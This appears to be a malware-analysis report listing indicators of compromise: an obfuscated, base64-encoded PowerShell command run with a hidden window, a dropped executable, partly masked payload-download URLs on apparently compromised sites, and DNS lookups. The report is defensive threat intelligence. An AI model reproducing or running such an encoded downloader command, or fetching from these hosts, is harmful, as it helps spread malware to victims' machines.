Technical Information
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JABCAF8AdQA0ADcAdwBkAD0AJwBRAHUAYwB1AGIAegA4ACcAOwBbAE4AZQB0AC4AUwBlAHIAdgBpAGMAZQBQAG8AaQBuAHQATQBhAG4AYQBnAGUAcgBdADoAOgAiAHMARQBgAEMAdQBSAGAAaQBUAHkAUABSAE8AdABgAE8AQwBPAEwAIgAgAD0AIAAnAH...
- %TEMP%\qzra.exe
- %TEMP%\qzra.exe
- http://si###rgh.com/wp-includes/brMYT734/
- http://si###rgh.com/cgi-sys/suspendedpage.cgi
- http://nl##o.com/wp-admin/4d2WC234123/
- http://vi#.#k6k.com/cs5h/aoX8wY2/
- http://es#####dugunsalonu.com/wp-includes/uCzyiZSkg/
- http://ae###nos.com.br/images/5ROM44/
- DNS ASK si###rgh.com
- DNS ASK nl##o.com
- DNS ASK vi#.#k6k.com
- DNS ASK es#####dugunsalonu.com
- DNS ASK ae###nos.com.br
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JABCAF8AdQA0ADcAdwBkAD0AJwBRAHUAYwB1AGIAegA4ACcAOwBbAE4AZQB0AC4AUwBlAHIAdgBpAGMAZQBQAG8AaQBuAHQATQBhAG4AYQBnAGUAcgBdADoAOgAiAHMARQBgAEMAdQBSAGAAaQBUAHkAUABSAE8AdABgAE8AQwBPAEwAIgAgAD0AIAAnAH...' (with hidden window)